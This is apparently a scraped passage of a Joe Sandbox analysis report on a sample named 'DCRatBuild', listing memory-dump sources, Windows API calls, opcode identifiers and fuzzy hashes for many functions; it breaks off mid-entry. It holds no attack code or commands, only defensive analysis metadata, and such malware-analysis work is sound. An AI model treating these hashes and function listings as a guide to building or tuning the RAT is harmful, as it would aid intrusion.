SetThreadExecutionState.KERNEL32(00000001), ref: 00080E3D

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: c16b955cdb044663bc1bbcac4b98097e33fd42034c3e43017cb7bbbd085f700d
Instruction ID: 8352665074ef6d779fe2015032d9db2cb855806227b297ca9e776d073e768c42
Opcode Fuzzy Hash: c16b955cdb044663bc1bbcac4b98097e33fd42034c3e43017cb7bbbd085f700d
Instruction Fuzzy Hash: 4CD01221A1519456EA62332968657FF254A9FC6311F0D4065B18A57283CA9D4886A362

Function 0008A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0008A62C

Part of subcall function 0008A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0008A3DA

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: a7ce5c451321facd5a90cdb4fd9e8d261523621bc749422a301579029ec28518
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: E2D0C771311609B6EF417B61CC129AF7595FB05350F048126B8C1D5552FAB1D9209766

Function 0008DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00081B3E), ref: 0008DD92

Part of subcall function 0008B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0008B579
Part of subcall function 0008B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008B58A
Part of subcall function 0008B568: IsDialogMessageW.USER32(000103F6,?), ref: 0008B59E
Part of subcall function 0008B568: TranslateMessage.USER32(?), ref: 0008B5AC
Part of subcall function 0008B568: DispatchMessageW.USER32(?), ref: 0008B5B6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: efa363b1feb328b2ff9f5570df9550980d66c00e2f05c17fd91c655e4ece41ab
Instruction ID: 2048bff4256e21627f8657f9cab1bb9f5476f0ab26f2ddaf486a71d08806e2b9
Opcode Fuzzy Hash: efa363b1feb328b2ff9f5570df9550980d66c00e2f05c17fd91c655e4ece41ab
Instruction Fuzzy Hash: 28D09E32144300BAE6013B51CD06F4A7BA6BB98B04F404555B284740B287729D21DB12

Function 0008E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 0008E5E3

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 124bf61d48b405219a94e8e6f7d9cab65b20310bd6c517be9410eb7faab98f73
Instruction ID: db60adc25a7ab7584b15d188165811d9a06be58eebd13cb0ce2b3bb8ce4d20af
Opcode Fuzzy Hash: 124bf61d48b405219a94e8e6f7d9cab65b20310bd6c517be9410eb7faab98f73
Instruction Fuzzy Hash: 6BD022B02D06C0ABE321FBA8EC467C83390B320B00FC00012F2C8C25A2EF684080C725

Function 000798BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,000797BE), ref: 000798C8

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 6e1ad960d2cf009f761f9449f3a919a47f41e1fa2ca53fd9d67dd359acc53ef3
Instruction ID: e5484a0e4fc72cf37a72b1951e42060342b2b9f748114653d7f604678c3cd24a
Opcode Fuzzy Hash: 6e1ad960d2cf009f761f9449f3a919a47f41e1fa2ca53fd9d67dd359acc53ef3
Instruction Fuzzy Hash: 1DC01234800205868EE08A2498480A973A2AB533A67B4C7D4D02C890E1CB2ACC87EA26

Function 0008E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d47a4d48f5215616da8f6ba345b403730df0233e2708ce78ee094232cab5d867
Instruction ID: 55025c77edf24045eb284c829d709dc65899e4d96d521adad2bff88a1c5768a6
Opcode Fuzzy Hash: d47a4d48f5215616da8f6ba345b403730df0233e2708ce78ee094232cab5d867
Instruction Fuzzy Hash: 72B092A9358281AC310432959C06C3B010CD382B10320842AB845C44819840AD400932

Function 0008E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d2ee462dc61beca79631ba0635ce4fc5a7529c7fdb5211564d9a78801a1806cf
Instruction ID: f0b2495bc431e6a0cb0029523ab2fb9f36a48312e5df1cf991bab2e9b55601d2
Opcode Fuzzy Hash: d2ee462dc61beca79631ba0635ce4fc5a7529c7fdb5211564d9a78801a1806cf
Instruction Fuzzy Hash: 92B092A9358282AC310462999C06C3B010CE382B10320402AB849C418198406D400A32

Function 0008E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3737fd7a173c29b5cfef5b17a9ae024a10a1b302e9e7c7a637efb29e4f210b73
Instruction ID: 49718a2472e10909d73ba5b9b316abe91064df3946f0571e38e6738dff94797d
Opcode Fuzzy Hash: 3737fd7a173c29b5cfef5b17a9ae024a10a1b302e9e7c7a637efb29e4f210b73
Instruction Fuzzy Hash: CEB092A5358181AC310462559C06C3A011CD3C2B10320802AB849C42819840A9440A32

Function 0008E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a81c5cf5cc22b0a3c89f53605ab010a1d9c9ef483e11bc5b8df9d337b430b463
Instruction ID: 224d431454af07ae8c743fac9e0428794c03b6422edc0ca229841d02d1b79b8f
Opcode Fuzzy Hash: a81c5cf5cc22b0a3c89f53605ab010a1d9c9ef483e11bc5b8df9d337b430b463
Instruction Fuzzy Hash: 95B012E5358181EC31047355DD06C3F011CD3C2B10330803FF849C4281DC506E490A32

Function 0008E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5f6cc709e12a7d99265c45eb3e5ba5ef1d044d15c98ec3c6cbf1999e127c91ed
Instruction ID: 7a0645c8c665bcea44f66f1036c32324f9e696c205019487f3d231daf416d168
Opcode Fuzzy Hash: 5f6cc709e12a7d99265c45eb3e5ba5ef1d044d15c98ec3c6cbf1999e127c91ed
Instruction Fuzzy Hash: 54B012E53582C1FC31447355DC06C3F011CD3C2B10330813FF849C4281DC406D840A32

Function 0008E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4dd1c858738b7d0893ce22f290ac5836ca56cab04a6f6b1cf2aa477e2a204fba
Instruction ID: 9ecc0b06d1a0d1e93815c58950bce9faf9eea35def473fde3601650e1b37b621
Opcode Fuzzy Hash: 4dd1c858738b7d0893ce22f290ac5836ca56cab04a6f6b1cf2aa477e2a204fba
Instruction Fuzzy Hash: 6FB092A5358181AC310462559C06C3A010CD382B10320802AB849C41819840AA400A32

Function 0008E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 387ccd8f334ac580dff5ec03c68e7492cad78590d2a6f78d62105b195ed93453
Instruction ID: a36f2e0dc7c28c9e24e7070d4f24107e9939669aff6d0600ba26ae30c6612ada
Opcode Fuzzy Hash: 387ccd8f334ac580dff5ec03c68e7492cad78590d2a6f78d62105b195ed93453
Instruction Fuzzy Hash: BCB012F5358281FC31447255DC06C3F010CD3C2F10330413FF849C4181DC406E800A32

Function 0008E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dd5bdc2a706727657af56d204187873358785eff349184ce5233fbd39095e9e8
Instruction ID: 0be48e1c6925c718c780c4555fe781dcd239870de6c6ba332ac7fda8ca67ff3f
Opcode Fuzzy Hash: dd5bdc2a706727657af56d204187873358785eff349184ce5233fbd39095e9e8
Instruction Fuzzy Hash: BEB012F5358182EC31047356DC06C3F010CE3C2F10330403FF849C4181DC406E400A32

Function 0008E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2403cc1c6dd960e2564c38b8ad95801ceb7b5bedab72c7b204926c5cd1b362bd
Instruction ID: d43d5313f1ccaeffc5590c5437083becd66a38ebd1b07ad9078d696b51add9ad
Opcode Fuzzy Hash: 2403cc1c6dd960e2564c38b8ad95801ceb7b5bedab72c7b204926c5cd1b362bd
Instruction Fuzzy Hash: 54B012F5358181EC31047255DD06C3F010CD3C2F10330403FF849C4181DC406F410A32

Function 0008E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b3868ab220a5dccd5055090d8e411b5286b32b5345055aba0518ee8a0af1189e
Instruction ID: 0df21151089e38231cdac66c8b5a8eb2748098a2e1b2c56a4125458e54db8cf4
Opcode Fuzzy Hash: b3868ab220a5dccd5055090d8e411b5286b32b5345055aba0518ee8a0af1189e
Instruction Fuzzy Hash: 50B012E53591C1EC31047255DC06C3F010DD3C3B10330803FFC49C4181DC40AD400A32

Function 0008E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8f5a1392ec5a240822e54757bb30a5ebb30f0592326e0e09b96193407b26ebd3
Instruction ID: 526202c3baba1e3a95fbae801711e51354d8e3db7359c639a490bc52cd80282e
Opcode Fuzzy Hash: 8f5a1392ec5a240822e54757bb30a5ebb30f0592326e0e09b96193407b26ebd3
Instruction Fuzzy Hash: B9B092A5359281AC314462959C06C3A010DD382B10320412AB849C4181984069840A32

Function 0008E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 708114065908f68f16869760f677cc85b9cb16ac83279c30151af17421b994e0
Instruction ID: 6a450c4e9bffbd49638d9fba6a84d3b93048143cdeef62ba8c62af90aadb8735
Opcode Fuzzy Hash: 708114065908f68f16869760f677cc85b9cb16ac83279c30151af17421b994e0
Instruction Fuzzy Hash: 1BB012E9358181EC31047265DC07C3F014CD3C3B10330803FFD49C4181DC40AD400A32

Function 0008E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0008E1E3

Part of subcall function 0008E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0008E8D0
Part of subcall function 0008E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0008E8E1

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

